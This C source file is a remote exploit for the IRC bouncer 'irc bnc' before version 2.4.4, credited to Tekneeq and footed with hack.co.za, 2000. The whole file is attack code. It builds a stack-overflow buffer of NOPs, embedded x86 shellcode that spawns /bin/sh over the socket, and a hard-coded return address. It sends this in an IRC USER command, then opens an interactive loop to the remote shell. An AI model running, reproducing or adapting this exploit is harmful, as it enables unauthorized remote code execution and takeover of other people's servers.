/* Exploit for irc bnc < 2.4.4.
 * This is only my third remote exploit, ever, so it might be a bit rough
 * around the edges. For instance the distance from the stack to the ret
 * pointer has to be *exactly* 1031 for this to work
 * 
 * Tekneeq - http://www.attrition.org/hosted/tekneeq  
 */

#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define RET_POS 1031

#define RETURN_ADDRESS 0xbffff9e0

char hellcode[]="\x31\xdb\x89\xd8\x89\xd9\xfe\xc1\xb0\x3f\xcd\x80\xfe\xc1"
                "\x31\xc0\xb0\x3f\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
                "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
                "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
                "\xff\xff/bin/sh";

int fdprintf(int dafd,char *fmt,...);
int tcp_connect(struct in_addr addr,unsigned short port);
void RunShell(int thesock);

int main (int argc,char **argv)
{
  int fd;
  int ctr,a;
  struct in_addr host;
  unsigned short port;
  unsigned char overflow_buf[4096];
  unsigned long *ret;

  if (argc < 3)
    {
      printf("Usage: %s <host> <port>\n",argv[0]);
      exit(0);
    }


  if (!host_to_ip(argv[1],&host))
    {
      fprintf(stderr,"Hostname lookup failure\n");
      exit(0);
    }

  if (!(port=atoi(argv[2])))
    {
      fprintf(stderr,"Invalid port !\n");
      exit(0);
    }

  memset(overflow_buf,0x90,sizeof(overflow_buf)); /* fill it with NOPs */
  a=0;
  for (ctr=(RET_POS-strlen(hellcode));ctr<(RET_POS);ctr++)
    overflow_buf[ctr]=hellcode[a++];
  overflow_buf[RET_POS+4]=0;
  ret=(unsigned long *)(overflow_buf+RET_POS);
  *ret=RETURN_ADDRESS;
  printf("Connecting\n");
  fd=tcp_connect(host,port);
  printf("Sending overflow\n");
  fdprintf(fd,"USER %s\r\n",overflow_buf);
  sleep(2);
  printf("Got shell\n");
  RunShell(fd);
}

int tcp_connect(struct in_addr addr,unsigned short port)
{
  int fd;
  struct sockaddr_in serv;

  bzero(&serv,sizeof(serv));
  serv.sin_addr=addr;
  serv.sin_port=htons(port);
  serv.sin_family=AF_INET;
  if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)
    {
      perror("socket");
      exit(0);
    }
  if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
    {
      perror("connect");
      exit(0);
    }
  return(fd);
}

int fdprintf(int dafd,char *fmt,...)
{
  char mybuffer[4096];
  va_list va;

  va_start(va,fmt);
  vsnprintf(mybuffer,4096,fmt,va);
  write(dafd,mybuffer,strlen(mybuffer));
  va_end(va);
  return(1);
}

int host_to_ip(char *hostname,struct in_addr *addr)
{
  struct hostent *res;

  res=gethostbyname(hostname);
  if (res==NULL)
    return(0);
  memcpy((char *)addr,res->h_addr,res->h_length);
  return(1);
}

void RunShell(int thesock)
{
  int n;
  char recvbuf[1024];
  fd_set rset;

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(thesock,&rset);
      FD_SET(STDIN_FILENO,&rset);
      select(thesock+1,&rset,NULL,NULL,NULL);
      if (FD_ISSET(thesock,&rset))
        {
          n=read(thesock,recvbuf,1024);
          if (n <= 0)
            {
              printf("Connection closed\n");
              exit(0);
            }
          recvbuf[n]=0;
          printf("%s",recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO,&rset))
        {
          n=read(STDIN_FILENO,recvbuf,1024);
          if (n>0)
            {
              recvbuf[n]=0;
              write(thesock,recvbuf,n);
            }
        }
    }
}
/*                    www.hack.co.za              [2000]*/